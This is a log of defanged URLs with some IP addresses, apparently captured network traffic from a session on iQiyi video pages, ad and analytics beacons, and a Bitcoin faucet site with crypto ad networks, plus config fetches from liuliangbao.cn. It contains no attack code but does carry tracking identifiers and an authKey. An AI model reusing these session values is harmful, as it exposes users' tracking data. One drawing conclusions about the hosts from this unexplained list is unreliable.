hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heAb1y8zHhESL05A9jqTN-_xcs6r_ygqa3471hOG2sKfIoo7D2VlowD6Maz-72y8SXfViIdJoaCoS_HPHWJSJDgiGrhcZWBxoUmZ9yyAUMmAo_4aO-ZoVQIQcqIq-yVmKRLtJco4qPxA4XtzpCIBjYyorLiBoLIAbbhd5F0JwLQyDI1lcJyYG-HWtHsKJeo7I1r0b8QXL_sw_iYZQsMnHbXby88qZA7AezNilyO5VjcFnX2hpHyuTKOGiqqeXNKCrRPxeulH-BdCgVIuHM5x2gT2GaRlDqGb8cKpM6du77WlaXoBegrJBDJ8tLBQr2k7TWUMtFrguvyHrXDYXGCSbDyvKIMa_aNdiw8xJyZcXWxfc9Gnr6sRGca4wBnDoeinYT&v=404&seq=1	106.39.169.66
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heyLT0pUyDiycWLTHdeJJaAdRT4maqHQLm9Y0AoCVAtZFJmB0rLnPKe4Awt6Yb-DkFjW8GmYsoqfjuDFyd-_33gEKpi2PHNuN-K8WV-zOdz9qxfzUr9BQGPFQ71MpT1UOK20_jRDH2XBUi6uJfEYhV9I3WMZWOKqr8vXvqhXEwLNLQk2B9X7RuULD4wZcA4WJD7s9GaHjd_JwDEtxobOrxX2D8KGBYiZSpTER0cZ8YEvjn2jqHCVe-dJp14Mc2F6Zszm6zwTXyROtTHpyWjCtYpY1kQe_wR-fcV_vEag-5GxfIq3O9uZYW4SQvx94a1YipoLuLAFXviTZpLe_1WYbMdepAHZNPONGVwjzQqaL89TcPXZiM0TCTEI1-H1A-2ljb&v=404&seq=2	106.39.169.66
hxxp://hm.e.shifen.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&ep={"netAll":1466,"netDns":1383,"netTcp":79,"srv":583,"dom":2056,"loadEvent":6899,"qid":"","bdDom":0,"bdRun":0,"bdDef":0}&et=87&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=2074899456&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906111480
hxxp://a326.r.akamai.net/crossdomain.xml
hxxp://px.3.cn.gslb.qianxun.com/prices/mgets?skuids=J_10263952097,J_1014668736,J_1712213997,J_1683079458,J_10481689014,J_2823639,J_10293479220,J_2631300,J_1002498991,J_10666538087,J_1612802959,J_1319192906,J_10654177939,J_1767125187,J_10292956874,J_1311634685,J_10608382784,J_1031724397&type=1&callback=dsp_1484906111088&r=1484906111107	111.206.230.21
hxxp://data.video.dns.iqiyi.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/cp2.gif?x=http://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf\|\|http://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf&p=v&lc=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&s=1484906112396&t=s&b=0&c=0&v=572044000&av=AdManager 3.63.0&fp=WIN 23,0,0,185&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&y=qc_100001_100226&pl=0
hxxp://msg.video.dns.iqiyi.com/cp2.gif?s=1484906112427&t=s&av=3.12.0&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&rd=1509&y=qc_100001_100226&p=pl&rc=1
hxxp://a326.r.akamai.net/common/fix/default_player_16_9.png?arg=01000011010000000000
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heEnmDgzEgJtbifhOVPNJDZL6mH1RGK8un5EUb_9dOg2LZm5QrA9b6KN-vXxSfzlPcMjoWBWB2Qi4sH93q7P68fKkAAFjL92af8brD9oOnSmt21L8iRmx_VVVc5QzQnuJiLqMVVudbR0NjyzLkTwqwEXN4scuxPw9hAirzu5jtOf4jwortaew7ipPMC0QuHuM33WD46Le0Ah331azG5hFqVzyu30AH1QsCnIPhwy44crCrLdRkmS6JAgqn-ZsgEAAXZsn4spVbueuUvN5eqLh_fEhs6XE-Aj-rUVIQhXt8o8OCExHVX9CCAPXguqrBMbysrUEQySUQPfJa6J5KiRS7hgjReGDX_6K_HenD3hEg7_xIRqfNClH-V7eA5dXazejC&v=404&seq=3	106.39.169.66
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hemtZz9E4T5Ml0FxIsOi7b9e6CUfixrWj0zyePKODPs2fGk99YKgmd96V7bd6iaxaASWVta4Uw2mVxa4JJOvd72JpgyGS2PR8XsdZpL87BcDLqEmShyhjsRfsafQQCZPFA_hKVZqjQdX3ELYetFcbXVAqCVOv1PdrOCh9nJwGQ_nznrRLps1ozknMgd89vuQqyu2i2zBsgyoqwlq3M2Ei-nUNOiBXoVGinGT2gWsz02E60z1_fh9cnGM_ZO7FTFH5ur-yg7X3l5JNppNRnOcHHgQMIr1IchhqvYCJpDCaDLQ8X-7NyDg5ouL6a6ILIEXLFe7KV8Q7Jc_-mR7kLuhqxXj3OZDFLEZECiJ1zoySaZfcuRvd5f3QK8YEjeW6nSRRe&v=404&seq=4	106.39.169.66
hxxp://data.video.dns.iqiyi.com/uid?tn=0.016473443247377872
hxxp://cache.video.dns.iqiyi.com/crossdomain.xml
hxxp://data.video.dns.iqiyi.com/uid?tn=0.896643178537488
hxxp://passport.pps.dns.iqiyi.com/pages/user/proxy.action
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/20170119180153/jobs/pc/ugcBodanPlay.js
hxxp://data.video.dns.iqiyi.com/uid?tn=0.4324387479573488
hxxp://cache.video.dns.iqiyi.com/vms?key=fvip&src=1702633101b340d8917a69cf8a4b8c7c&tvId=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&vinfo=1&tm=952&qyid=&puid=&authKey=bc6811ba189dbccef005d66f72770de2&um=0&pf=b6c13e26323c537d&thdk=&thdt=&rs=1&k_tag=1&qdx=n&qdv=2&vf=746cf15c43ca5b06081b3fa8a82442b0
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22608113
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he9IK0zj-LilCRyIGNw1kitd8XCIJu4Ib482Juro__479AUxpU8Df2fi-fQzKtSBnuwH-MVzd9FU8gOZlxlgfuwhfXAH7eBcC4JPMuv7GPXIy5H6gl9t1AHhoBDab6lSrK2hGmB9VSACPHoeXmattKj2FxyzAvW-kl6pOZ9FECT3hiXOWmOEGWzBFFP7FEgw2XkdeskaSCWNzoJUvCYRix5cGUhpe-tJkLjG3b6cWv6BLpg0FSYhNA6_xbdlUStbXW_eT7FI2G2829RaOJ4Cg2UNe5vaswjY5D6nGwYjrdWrFbZcKjkLM8sjUk0cn6CyI6rdSkdq2ECosvv9Tk13C4xfcX4ALs1iT1psPlXO0Zun2sMkJbvIKg5Q3SUwTvcH-b&v=404&seq=6	106.39.169.66
hxxp://t7z.cupid.dns.iqiyi.com/crossdomain.xml
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_helkJjAewu65OsBLgXRnmTvc3AVFJ-nBZMBU9KtqCZLcy-AbNWPYbf7GmNI2lEK32K0VG9tOWibFGYRxkdwLZs5Z_dpN_c2yorTnWLFwdrSIdgMAMNTUw9-xMvBUaHYCIPzc6pDoco1r_7AkBO7zWbf-wMIKHXW9-KGCLr2eNRdOXZFm96vsDuT6fi5nGdSRbTIXyUNUHw5PAioQCMVkoQplfyQWGcuT8fsDo6aV3YKw5o9EnGZ8z8EJoHWXYsHF8mFFwAQx4F1XtsLGWJS-OiGzF9KGKQmrCd_NuB4fMXjbIsdGYDd50APKO2_iqR3Qp5xUWJB2hTbvkbU7C0R1d1TNpcFply462Nm5gG0IbFXACnMqE3nLLbIwETMolAEJR8&v=404&seq=7	106.39.169.66
hxxp://e5233.a.akamaiedge.net/player/cupid/common/clear.swf?r=xv1v5n
hxxp://ap.liuliangbao.cn/clt/config/bl_6.5.dat?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=vrld&vms=1&tl=2539&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.12644612696021795
hxxp://cache.video.dns.iqiyi.com/sci/gm/3/572044000/?src=1702633101b340d8917a69cf8a4b8c7c
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=load&prgr=0&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.22120652068406343
hxxp://a1294.w20.akamai.net/b?c1=1&c2=7290408&c3=10&c4=11&c5=&c6=&c7=http://www.iqiyi.com/v_19rra3jt70.html&c8=&c9=&c10=&c11=5088e17771f6d54476f95dc61f9e80b4
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/1050c72eeb6.swf
hxxp://t7z.cupid.dns.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU1MPBlcAOwwAFlNGDGofAx4AHAJGRTsMABZVUQxuF1dEDwMQHV5vF14NABZBMAwBFkJAC0FFL0INABZAR2IAFkEPUUJLUnlCRg0DHgdsHwAWR14LGRcrQQofH0dGKB9ZQVtLX18AMFwfRm8BCC1DUQNYRgFBTTdFXVwWRgxvF0ZVW1YLSFs5AlYACAQCZlIGCFELVERUPQIFAgBWAWkIBlZQAFVXFGIBFkkNAA==&h=1484906112411&s=60d34018ac24eb58180b7eb57af7bbf5
hxxp://ap.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9	106.39.169.66
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hebtboSJ6LnIVrJSLFTFAor6VibSw4roh9pVbMZp9UcE8uIoVcWJijeAaMqIiza0gk14gOAuJt5BfBvNg_B0OM4DdUu5kuIzf2jvfzxWGhvqSoIXIN5Zsxd5XfxO6X9nF8C6KTWUFOCcu2k-Y_sjHFjrhTRV5VyRzvC3wmInmnXYGXJTZIdnAjyfzOhwuYrGE8d_t79q2bd1hawuJc__CcDSM4Vqm-MSDgNPASm8mE09PgVXumdj8hkrzimh_Rd2RRvNxxus369cMbtIMMIcIvTvF_Ru1wbI9R7YfGziPepiLZu9Sl1LX_rGaA3-bqb_BcQFWaNWM1rqad5eXbrCMtxvTHnL6i2KVYpZpKCKZbOUMhYuHYOuvjDcPqd0w1NRwx&v=404&seq=8	106.39.169.66
hxxp://static.n.shifen.com/v.gif?pid=324&qiyi_cookie=&t=1484906112271
hxxp://cpro.e.shifen.com/cpro/ui/html/sync.htm?sid=&p=iqiyi&t=1484906112271
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=ready&purl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&vvfrmtp=manclick&rfr=&lrfr=DIRECT&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.8087925375439227
hxxp://msg.video.dns.iqiyi.com/core?t=15&ptid=11&pf=1&p=10&p1=101&c1=10&r=572044000&aid=204432001&u=5088e17771f6d54476f95dc61f9e80b4&pu=&v=3.3.12.9&ra=2&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&ce=11d91127a84babbf6dabdf9e702b5f03&ve=0418909173dcc97c13d68d5c2ee32172&vfrm=&vfrmtp=manclick&sdktp=1&hu=&ht=0&mod=cn_s&islocal=0&rfr=&lrfr=DIRECT&rn=0.6126211592927575
hxxp://t7z.cupid.dns.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU0QPA19QcQMeBAcWVWIEBxZXUwtARThFDQEWXAxtAQQEAQAGQVJ5Xw0AFkBeYgEWQEAPBlcTLAwAFkBGDG4XQQ1IWwxAU28BAAAAAAFvBAMGHlFCS1NkS1kKAQABbwEAAAICBkdQbx1TRAoACiVYCgECAgZBU28BAAAAAwhzUkQKAglMGFluAQAAAAABbwEAAAYCGhIXZQELSlkKAG8BAAACAgZBU2wDARxTRAtvF0NGDwEYR1BxARZFXA1ZK0VACh0dQQYUcVhBWUlZHzxeXR9EbQdIES1QA1pEBwFxWURdXhRATFN5R1VZVA0IZ1cDVgIKAkJaPAcIUwlSBGhTAwUAAlBBVWYHVlICUxcoDAAWSw8G&h=1484906114377&s=8f6f04431c47096fdb4b10b9161f986a
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170118/10382a1b82aa.swf
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20161122/1823925a82d4.swf
hxxp://msg.video.dns.iqiyi.com/jpb.gif?rdm=1738841934&qtcurl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&rfr=&lrfr=DIRECT&jsuid=o5rodndzg8of8s4mwfefai5c&qtsid=1484906110,1484906110,1484906110,1&ppuid=&platform=11&fcode=&ffcode=&coop=&weid=11d91127a84babbf6dabdf9e702b5f03&pru=&fvcode=&mod=cn_s&tmplt=bodantplt&flshuid=5088e17771f6d54476f95dc61f9e80b4&as=c6ef95c1f39a49124dae509aae8e1a88
hxxp://irs-azure-east.irs01.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=140707adinit&pla=11&mod=cn_s&tn=0.23817403800785542
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=rptusr&newusr=1&suid=5088e17771f6d54476f95dc61f9e80b4&tn=0.5403782017529011
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he4eNkbQAXSVjSzyFW81pDZ1LQvRk0CVy9J18PeJAbVVt-IMC1Zl8l1WjWIKsObHQmfGpfbZyKbox8daLfvnzv-6kCE7nnFtZ3paiDX_-ZsB8MuOjgvFxwEQr8ayg0miQDuoxxxoh7E4Gd6pZxmF9AGchxt3FyQ8IGgTXhFf4aSOO2YdX2qGA5tfgMvXwz7YD21LeOReOWn5in9ya3T5q9mXTvU4J_aADuR2ne1UtxV3ZpKoaYgF0LScgRk1v50wpzWtQUBhjCXsPr2gs89m6NGFVIVT1MXAW1ITtUq2JnutP1epFGIuAh8bpninXTA140cE_nlxrycHwdZYnlyJfnsELu7IoeclyYRYdr2Z8s7RKZmdOeYrJ7saFdudE3V1Rj&v=404&seq=5	106.39.169.66
hxxp://coinsns.com/index.php?s=/lottery/index/index.html
hxxp://101.227.188.34/ics?a=194.242.96.218&b=9b9366963d49845dcaef1cf22d487ad8
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&rd=1966&h=0&p=s&rc=1&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://a1470.r.akamai.net/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&h=0&p=i&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=activeplay&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.4783940138295293
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=stuenv&plyrver=3.3.12.9&pla=11&os=Windows 7&browser=MSIE&dpi=1276X846&flashver=WIN 23,0,0,185&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.4808125551789999
hxxp://coinsns.com/Public/zui/css/zui.css
hxxp://static.dns.iqiyi.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=startvisits&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.2609360576607287
hxxp://pagead46.l.doubleclick.net/pagead/js/adsbygoogle.js
hxxp://nlwl.dns.iqiyi.com/apis/urc/getqd?authcookie=null&containsUgc=1&agent_type=1&subTypes=1,7,9&channelIds=1,2&callback=window.Q.__callbacks__.cbji48aq
hxxp://e5233.a.akamaiedge.net/js/common/ares2.min.js?1484906115570
hxxp://coinsns.com/Public/css/core.css
hxxp://coinsns.com/Public/js/ext/magnific/magnific-popup.css
hxxp://coinsns.com/Public/zui/css/zui-theme.css
hxxp://a1470.r.akamai.net/20161122/3a/3c/0ad38a6488686acc96d4ec67497a33b9.xml?tn=0.09199875919148326
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&rd=1170&h=0&p=s&rc=1&s=1484906115563&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://coinsns.com/Public/js.php?f=js/jquery-2.0.3.min.js,js/com/com.functions.js,js/core.js,js/com/com.toast.class.js,js/com/com.ucard.js
hxxp://coinsns.com/Public/js/com/com.talker.class.js
hxxp://coinsns.com/Application/Lottery/Static/css/lottery.css
hxxp://coinsns.com/Addons/CheckIn/Static/css/check.css
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&h=0&ri=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&oi=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&p=i&s=1484906115563&di=0:n1,88,5000000911968,:1000000005931;&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?url=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&tag=done&curl=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&useTime=1154&dur=5644
hxxp://cache.video.dns.iqiyi.com/jp/vi/572044000/787ab6983c8a883fa3c5190ce3cac804/?status=1&callback=window.Q.__callbacks__.cb2r2oc2
hxxp://irs-azure-east.irs01.com/irt?_iwt_id=null&_iwt_UA=UA-iqiyi-100009&jsonp=SetIDA0&_iwt_p1=A-0-0&_iwt_p2=572044000&_iwt_p3=56-0-0-0&_iwt_p4=787ab6983c8a883fa3c5190ce3cac804&_iwt_p5=&_iwt_muid=5088e17771f6d54476f95dc61f9e80b4&r=5889
hxxp://msg.video.dns.iqiyi.com/b?t=21&u=5088e17771f6d54476f95dc61f9e80b4&pu=null&pf=1&bstp=24_dmfc&p2=1011&qpid=572044000&aid=0&block=1409011_dm&p=10&p1=101&_=2134069781
hxxp://msg.video.dns.iqiyi.com/b?t=20&p=10&p1=101&pf=1&block=B&r=&pu=null&u=5088e17771f6d54476f95dc61f9e80b4&jsuid=o5rodndzg8of8s4mwfefai5c&ce=11d91127a84babbf6dabdf9e702b5f03&re=1504*175629&clkx=0&clky=0&mod=cn_s&tm=8205&tmplt=dianshijunewtmplt&qpid=572044000&rseat=608241_cls_default&_=1166079991
hxxp://nl.notice.dns.iqiyi.com/apis/msg/hasnew.action?count=5&agent_type=1&callback=window.Q.__callbacks__.cb3onixz
hxxp://so.dns.iqiyi.com/m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b
hxxp://coinsns.com/Public/zui/fonts/zenicon.eot?
hxxp://cache.video.dns.iqiyi.com/jp/recommend/videos?referenceId=572044000&albumId=0&cookieId=o5rodndzg8of8s4mwfefai5c&channelId=10&withRefer=false&area=swan&size=10&type=video&trimUser=false&pru=&playPlatform=PC_QIYI&callback=window.Q.__callbacks__.cbg39tfk
hxxp://pagead46.l.doubleclick.net/pagead/js/r20170116/r20170110/show_ads_impl.js
hxxp://coinsns.com/index.php?s=/lottery/index/verifygee/rand/J3g0ttxl.html
hxxp://coinsns.com/Public/static/qtip/jquery.qtip.css
hxxp://coinsns.com/Public/js/ext/atwho/atwho.css
hxxp://coinsns.com/Public/js.php?t=js&f=js/com/com.notify.class.js,static/qtip/jquery.qtip.js,js/ext/slimscroll/jquery.slimscroll.min.js,js/ext/magnific/jquery.magnific-popup.min.js,js/ext/placeholder/placeholder.js,js/ext/atwho/atwho.js,zui/js/zui.js&v=.js
hxxp://apps.cointraffic.io/js/?wkey=10E7Cr	37.0.25.88
hxxp://api.geetest.com/get.php?callback=gtcallback	198.11.176.80
hxxp://api.geetest.com/get.php?callback=gtcallback&_=1484906116454	198.11.176.80
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=QP10TX6B6KV66
hxxp://mellowads.com/view/8A4F0C723F1C	104.20.132.4
hxxp://coinsns.com/Public/static/jquery.iframe-transport.js
hxxp://coinsns.com/Public/js/ext/lazyload/lazyload.js
hxxp://coinsns.com/Application/Lottery/Static/js/radialIndicator.min.js
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=QAJCZO2RSCH65
hxxp://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=DNXGITSPBPYNI
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=VQY6CNGEKEK2J
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=1070368555&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AAgAAEAAI~&jid=181594928&cid=150513197.1484906118&tid=UA-70454598-1&_r=1&z=1010198880
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=9GMQOGUXRJ58I
hxxp://mellowads.com/css/size1.css?v16	104.20.132.4
hxxp://a1811.g.akamai.net/quant.js
hxxp://anycast-europe.quantserve.com.akadns.net/pixel;r=1302890811;a=p-pV8razYeGyZwj;fpan=1;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=
hxxp://api.geetest.com/static/js/geetest.5.10.0.js	198.11.176.80
hxxp://api.geetest.com/static/js/geetest.0.0.0.js	198.11.176.80
hxxp://api.geetest.com/get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=7185e65f5aea0024bf35c5c1275d75da&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906123874	198.11.176.80
hxxp://api.geetest.com/static/golden/style.3.2.0.css	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75dal5&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906122184	198.11.176.80
hxxp://up.video.dns.iqiyi.com/ugc-updown/quud.do?dataid=572044000&type=2&userid=&flashuid=5088e17771f6d54476f95dc61f9e80b4&appID=21&callback=window.Q.__callbacks__.cbrokkg9
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da97&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906128459	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da5s&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906123339	198.11.176.80
hxxp://cache.video.dns.iqiyi.com/jp/mixin/videos/572044000?callback=window.Q.__callbacks__.cbae6bg&status=1
hxxp://coinsns.com/index.php?s=/ucenter/public/getinformation.html
hxxp://coinsns.com/index.php?s=/lottery/index/btc_rate.html
hxxp://coinsns.com/index.php?s=/lottery/index/getlast.html
hxxp://apps.cointraffic.io/bnr?wkey=10E7Cr	37.0.25.88
hxxp://apps.cointraffic.io/bnr/?wkey=10E7Cr	37.0.25.88
hxxp://apps.cointraffic.io/css/slide/?key=zGLVXy	37.0.25.88
hxxp://apps.cointraffic.io/js/pnd2/script.packed.js	37.0.25.88
hxxp://apps.cointraffic.io/css_cr/slide/?key=zGLVXy&b=601	37.0.25.88
hxxp://coinsns.com/index.php?s=/lottery/index/verifygee/rand/IJnCjr0h.html
hxxp://api.geetest.com/get.php?callback=gtcallback&_=1484906133801	198.11.176.80
